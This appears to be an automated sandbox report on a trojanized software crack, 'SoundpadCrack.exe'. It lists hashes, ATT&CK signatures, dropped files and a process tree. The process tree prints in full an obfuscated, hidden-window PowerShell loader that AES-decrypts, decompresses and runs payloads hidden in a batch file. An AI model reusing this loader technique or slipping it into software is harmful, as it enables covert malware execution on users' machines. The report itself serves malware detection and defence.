Overview

overview

10

Static

static

3

SoundpadCrack.exe

windows7-x64

8

SoundpadCrack.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    29/06/2024, 22:12

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    SoundpadCrack.exe

  • Size

    8.7MB

  • MD5

    c0aeb81be9a7f88af4a36e3e646dc3c5

  • SHA1

    94817a864fb081074a7791a5d1ba118cf47a956d

  • SHA256

    054f6d798fd4a1ec3277da62d9e8e7dd7442cf2987ae28578381bdcb786342dd

  • SHA512

    88467c8e039175668804d2449c9036ca88ccb4406dd42f20b85c0562dd89e8df7eb6de0f55208f121d5755ea1d107615f3c277fb5bb9a5119a054c1ab99e330c

  • SSDEEP

    196608:V3GEsUvU3MyTpgJQLpdXk5AvRkYNd012erwKnFdZlGP1+H4mbqRHXjF:9sUMZTpgn5Ah3ozZlGNZI83h

Score
8/10
executionpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 6 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SoundpadCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\SoundpadCrack.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1252
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "extrahelper.bat" & start "" "soundpad.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "extrahelper.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vJT6fStKg0zjGiy7XVLKIoIq02djrp3n5TnkMWwlDwM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hEEtcPzCu4poxw0XIUJw0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SHNnY=New-Object System.IO.MemoryStream(,$param_var); $qIcru=New-Object System.IO.MemoryStream; $LvUqn=New-Object System.IO.Compression.GZipStream($SHNnY, [IO.Compression.CompressionMode]::Decompress); $LvUqn.CopyTo($qIcru); $LvUqn.Dispose(); $SHNnY.Dispose(); $qIcru.Dispose(); $qIcru.ToArray();}function execute_function($param_var,$param2_var){ $zuAhi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LIRQa=$zuAhi.EntryPoint; $LIRQa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\extrahelper.bat';$jhCzE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\RarSFX0\extrahelper.bat').Split([Environment]::NewLine);foreach ($Vlubi in $jhCzE) { if ($Vlubi.StartsWith(':: ')) { $gKUWY=$Vlubi.Substring(3); break; }}$payloads_var=[string[]]$gKUWY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:904
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Soundpad.exe
        "soundpad.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SoundpadService.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\SoundpadService.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:2316
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s "C:\Windows\system32\UniteFx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:1276
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s "C:\Windows\system32\UniteFx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:2688

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Profile\CRACKED BY Ray_Black\SteamUserID.cfg
          Filesize

          61B

          MD5

          62edbc0689f3819eb0b7ca1fce5cd8ef

          SHA1

          292927a1b5150e98f40dc4aa67e3d29d07096065

          SHA256

          dc079a34addb9d3ad7bf19cc845c17e58fd1e0f02dccef36941240b52cb158d8

          SHA512

          7909b368c9bdda8d97703d379cc128f851740042130eb7f4484215dc19250508d616ce9f981f0c41c30d12a4fd5225be9d37e93165e2c905096241fd7d156d2e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Soundpad.exe
          Filesize

          11.7MB

          MD5

          186dd6db5675edc1a5c70dfd1f48e205

          SHA1

          c76f15edfb347c94f7e01d011ad27ecf5e204550

          SHA256

          52dc2fd4102cfcb49e04400db09a246c70b202d889550b912cf8001ae1b3e55a

          SHA512

          062198a0e2f86f82ebb9afa5dfd728423f898f9ac32ebf0cb2282a6d145c0941eef85a6ca8a800f581dcfef44dcf2ffc5788486936926528a2611d00aace117b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SoundpadService.exe
          Filesize

          299KB

          MD5

          b684849f377d67a5334524a01b4d6f9b

          SHA1

          1bc72eb5dc8b323a6835e491f3166576a670481f

          SHA256

          1b15187efca20081dd8a746a7dff73e7c9c970989639f6fd4083fc53afa9e204

          SHA512

          34bdbce5089a62322af81a51b4c752fc23e398eb6f3f83a062d7fa2cb1352de33e7df192ee4fda3e0a67c86f111e8ee1064b4560aae15b3c8c059c6122dc0b73

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SteamConfig.ini
          Filesize

          135B

          MD5

          8aaae6e65f734e7f90b2d11966c76a16

          SHA1

          f910a899891026e6d22305d176a73d2588b99715

          SHA256

          c2702d244e84cb0abc4f964062b9ecf51b1697712ad4c03b37d345f93d045bba

          SHA512

          96f0c7cd0b8e2ce8365f907a03c8229ed733fdcd07a826d82aa242c870f5994d04b1987263ba2a8e0a314ab281d5cf9905cc562177e09b499a99fe3e8d3cfb5e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\UniteFxUpdate.dll
          Filesize

          442KB

          MD5

          0ee743073ee6b68f8222be2661d95315

          SHA1

          2e642772ec19edf73422fe25a8d45db1a006ff85

          SHA256

          562b17370c7283e92a3353b76ab2aefd301c2e78782fa60ec9ee35676ad44f96

          SHA512

          c3f2037bd37cef7978187f67f1d0633ee3067b4837e0ad9ae2a5c8efab8ec4ce6a14c1d88e200ffaa8677f74fd5995789297e6a7b5ac18d19dc9d53b4d9170ba

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\extrahelper.bat
          Filesize

          265KB

          MD5

          b45b76c39b6e78b8bce0142e954312d1

          SHA1

          f2db222eb9166bf06ecf6d71bfdd59ea18352300

          SHA256

          cc7e4b15eac293f2a94d6de2a104fdb1ebac2d4cc0ba55d906eb36e47338df15

          SHA512

          b0040f9306c201d0b3357ff1812686e01ebb3db5d41cd49531a9327f197374f07dd7d861190d307e7461e2afbc841441817cbd2c1d0de0d02cc74a427cd89be7

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\languages\de\translation.mo
          Filesize

          49KB

          MD5

          6ff1d323c51c2ed88f05ee7ff468900f

          SHA1

          49c7d5042fc7644c094c3be52d7d0666c268accb

          SHA256

          5220672f99b439b1db77479ab170a5a0f2b65b4b14416b72447ded6f1ebcd40e

          SHA512

          32c065115ea0ebca406fb0d5831c39c79acb7c8e45941df8f0074a3ebd4077a61e5b8b6661a3a001114269b085877f3cdb39a456f0db42c5d492adcb06aca97b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\languages\et_EE\translation.mo
          Filesize

          53KB

          MD5

          ed94f0e5c81c0c47073c1d9315024951

          SHA1

          1c41ae8a6783348c72d9f2ec9792782533d0be26

          SHA256

          9e7b7de3ca6f080ec99633f2c2e5c629a937268086944cc6ed5dabe2b94c120e

          SHA512

          7c7263b73252bf3eae78cf1d70ead5fbc7e4678465cf8a84c36c9efb133749ecb70ee53d563fdfc65ec11add468201446c7b9108dfc68c0985126f9002d0dfa6

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\sounds\ba dum tss.mp3
          Filesize

          43KB

          MD5

          ecfd36db4cd603fe69fb216ec96314f3

          SHA1

          e773f5862cae36da5b2c94bd9ba19f6a3b30ae2c

          SHA256

          0f346c69f70725b3c0f37d26774fd530d5fc331584a6cfd4eb90857c9be305e5

          SHA512

          644271db61503904fe8a5de3e95e3617f3faf9287862739c929be85e71d8813c30939eb5104072e11dcda71e6f66717077b2e242c33bc7fc49b22fbf5c318673

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\sounds\cue.mp3
          Filesize

          72KB

          MD5

          6048a9609cb4d0a5d2a7d833903d1f75

          SHA1

          1c76f5538c9977dbe2ab0d0e259d049410a43ee5

          SHA256

          c27d55a0413a61b5fb3f30628a2a398602405cc68b2e4e26dc7c196419bba0c6

          SHA512

          cb4a5389e1f8cf7c702522bf2bd54fbef82ad8417a5d46ef3348a35f4912b70801824eef193efe033902487c9deca37fd29782061857c9390819d381d88eccf1

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\sounds\firework.mp3
          Filesize

          40KB

          MD5

          6b19a6bf2f055cc832a8c3b8a7a520ba

          SHA1

          155d3d969d3a87e35c7aef64674baee3e95d2a49

          SHA256

          a4d6fe757479e9a99523f654cedfc5f3d062d02e7d5313d96ad5bf77f58713c6

          SHA512

          36a491302001051ba265e201ebdd9b7a637f3eadfa258f60943ce7ab333e6aa4548c448d70874fe3794fc5c5734e3bbdf3789d9e9ab67b64e9d24f1a32c20498

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\sounds\scream.mp3
          Filesize

          60KB

          MD5

          3fd3a3b313d14a4f8db4e979c38f7fc5

          SHA1

          75d00502088a8f545e1b6225d2985f0e806fd5ef

          SHA256

          d435c1e228e64b5c6883822399026b144827b54d5b06d2ab1df1462710703fc7

          SHA512

          70504de941cda487977a689e6ca2cb46505e92838b083df82a70853f876dbcf6745e42d657e90cf7a9ac5d6d6e43a443e4bef643da950e32f6ab1a30f1c44a8f

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\steam_api64.dll
          Filesize

          3.4MB

          MD5

          fde6c8bf079648ef175bfe54a48c33bd

          SHA1

          86da9176866a1f03ca8ad7fd381c3f2cfc89c6e8

          SHA256

          0a1e5c53cbad6b21de61e11f023c0d3f11f698164c743bd272741a7ba59ca5d7

          SHA512

          d750550d1abe01f8b59623e58dd366d3baa6b0a03a48f0c95f381d30481ffd20549801979c3c9d19145521a0f3dd8dbd6397347ec4d3448ab1ef4ad8e781a1ab

          Download Submit

        • memory/904-148-0x0000000002790000-0x0000000002798000-memory.dmp

          Filesize

          32KB

          Download

        • memory/904-145-0x000000001B710000-0x000000001B9F2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1812-134-0x000007FEF4E80000-0x000007FEF5ED0000-memory.dmp

          Filesize

          16.3MB

          Download